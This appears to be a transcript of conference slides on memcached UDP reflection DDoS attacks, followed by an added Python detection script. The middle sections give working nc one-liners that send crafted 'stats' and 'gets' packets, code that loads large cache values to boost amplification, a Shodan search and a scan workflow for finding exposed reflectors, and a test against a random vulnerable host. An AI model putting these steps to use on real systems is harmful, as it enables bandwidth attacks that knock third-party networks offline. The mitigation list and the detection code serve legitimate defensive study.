Deluge - Power Of Community
Transcript of Deluge - Power Of Community
How to generate 2TB/s reflection DDoS data flow via a family network
Deluge
Why this talk?
▪ About DRDoS
▪ DRDoS by memcache
▪ DDOS the real world
▪ Mitigation and conclusion
1. About DRDoS: How it works
Common type: Reflection DDoS
How DRDOS works
How to measure
▪ PPS (packets per second)
▪ BPS (bits per second)
▪ BPS = Amplifiers × Amplification Factor (1)
Common type Reflection DDoS
Trends of Protocols Used for Reflection
Frequency of Protocols Used for Reflection
UDP reflection and amplification attack types and their percentages in recent weeks. Data from 360 Netlab.
Common type Reflection DDoS
Measure Amplification Factor
Common type Reflection DDoS
Tips to Increase BPS
▪ Common UDP service
▪ The biggest reflect parameter on service
▪ Increase server to send fake UDP packet
2. Memcached
About memcached
The risk of Memcache
Exploit Memcached with fake UDP packet
About memcached and risk
▪ General-purpose
▪ High-performance
▪ Widely used
Which case can cause a big reflection in memcached?
```shell
python -c "print '\0\x01\0\0\0\x01\0\0stats\r\n'" | nc -nvvu 10.105.16.119 11211 > /tmp/null
(UNKOWN)[10.105.16.119] 11211 (?) open^C sent 16, rcvd 1263
```
1263/16 = 78.94 (bytes received / bytes sent = amplification factor)
Memcached Reflection power
Insert data:
```python
import memcache
mc = memcache.Client(['10.105.16.119:11211'], debug=True)
mc.set('xah', s, 90000)  # s is the large value prepared on the slide (not reproduced in the transcript)
```
Test UDP read: 565600/18 = 31422.22
Deep in Memcached Reflection power
Max: send 18, rcvd 81620045344
Min: send 18, rcvd 38209921227
```shell
python -c "print '\0\x01\0\0\0\x01\0\0gets a b c d e f g h j k l m n o p q r s t w v u x y a\r\n'" | nc -nvvu 10.105.16.119 11211 > /tmp/null
tcpdump -i eth0 udp port 11211 -w mem.pcap
```
28295168/63 = 449129.65
```shell
python -c "print '\0\x01\0\0\0\x01\0\0gets a a a a a a a a a a a a a a a a a a a a a a a a a a…\r\n'"
python -c "print '\0\x01\0\0\0\x01\0\0gets a a a a a a a a a a a a a a a a a a a a a a a a a b…\r\n'"
```
Exploit:
▪ Unauthorized
▪ Inject big cache
▪ UDP Amplification
▪ Distributed Cooperation
3. DDoS the world
Unauthorized Memcached
Small scale test
Shodan: port:11211 product:"memcached" → 107,900 results
Scan: Port scan with the default Memcached port 11211 (TCP & UDP)
Grab: Banner grab with packet to identify the unauthorized Memcached
```shell
tcpdump -vv udp port 11211
```
Filter: Filter out the unauthorized Memcached with reflection power
One random vulnerable host: DDoS at 500 Mb/s
Video
1 reflector = 0.5 Gbit/s, just "gets z z z"
??? Gbit/s: how about using "gets z z z z z z z z z z"?
Over 50,000 (at least) after a simple filter
Memcached location information
Make a simple calculation. The bandwidth is up to the amplifiers:
max < 25000 × 100 Mbit/s = 2500000 Mbit/s ≈ 2.384 Tbit/s
4. Mitigation & conclusion
Memcached:
▪ Authorization
▪ Properly configured
▪ ASN information
Network Mitigation Measures
▪ Firewall UDP 11211
▪ ISPs must never allow IP spoofing (BCP 38)
▪ Rate-limit inbound UDP traffic with source port 11211
▪ Isolation ACL
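Detection counterpart to the amplification measurements above and to the mitigation list, as an added example that is not from the talk: it parses tcpdump summary lines for UDP port 11211, computes the rcvd/sent amplification factor per memcached host the same way the slides do (1263/16 = 78.94), and flags destinations that receive replies from several reflectors, which is the inbound source-port-11211 traffic the rate-limit measure targets. The sample lines are constructed, and the regex assumes tcpdump's default UDP summary format.

```python
import re
from collections import defaultdict

MEMCACHED_PORT = 11211

# Matches one tcpdump summary line per UDP datagram ("length" is the UDP payload size), e.g.
# "IP 10.105.16.119.11211 > 198.51.100.7.40000: UDP, length 1263"
LINE_RE = re.compile(r"IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
                     r"UDP, length (?P<len>\d+)")

def parse_line(line):
    """Return (src, sport, dst, dport, payload_len), or None if the line is not a UDP summary."""
    m = LINE_RE.search(line)
    return None if m is None else (m["src"], int(m["sport"]), m["dst"], int(m["dport"]), int(m["len"]))

def amplification_by_reflector(lines):
    """Per memcached host: request bytes to it, reply bytes from it, and rcvd/sent (e.g. 1263/16 = 78.94)."""
    req, resp = defaultdict(int), defaultdict(int)
    for parsed in filter(None, map(parse_line, lines)):
        src, sport, dst, dport, n = parsed
        if dport == MEMCACHED_PORT:
            req[dst] += n          # query towards a memcached server
        elif sport == MEMCACHED_PORT:
            resp[src] += n         # reply from a memcached server
    result = {}
    for host in set(req) | set(resp):
        factor = resp[host] / req[host] if req[host] else float("inf")
        result[host] = (req[host], resp[host], round(factor, 2))
    return result

def reflection_targets(lines, min_reflectors=2):
    """Hosts receiving memcached replies from >= min_reflectors distinct servers: the victim of a
    spoofed-source flood never queried, yet UDP with source port 11211 arrives from many hosts."""
    reflectors = defaultdict(set)
    for src, sport, dst, _dport, _n in filter(None, map(parse_line, lines)):
        if sport == MEMCACHED_PORT:
            reflectors[dst].add(src)
    return {dst: len(srcs) for dst, srcs in reflectors.items() if len(srcs) >= min_reflectors}

# Constructed sample capture (not from the talk): 198.51.100.7 is the spoofed victim address,
# 10.105.16.119 and .120 play the exposed memcached servers, the last line is unrelated DNS noise.
SAMPLE = [
    "12:00:00.000001 IP 198.51.100.7.40000 > 10.105.16.119.11211: UDP, length 16",
    "12:00:00.000900 IP 10.105.16.119.11211 > 198.51.100.7.40000: UDP, length 1263",
    "12:00:01.000001 IP 198.51.100.7.40001 > 10.105.16.120.11211: UDP, length 63",
    "12:00:01.000900 IP 10.105.16.120.11211 > 198.51.100.7.40001: UDP, length 1400",
    "12:00:01.001000 IP 10.105.16.120.11211 > 198.51.100.7.40001: UDP, length 1400",
    "12:00:02.000000 IP 192.0.2.9.53 > 198.51.100.7.40002: UDP, length 512",
]
```

Run it against `tcpdump -l -n udp port 11211` output on a border capture; a destination that shows up in `reflection_targets` while never appearing as a requester is the case the firewall and rate-limit rules above are meant to absorb.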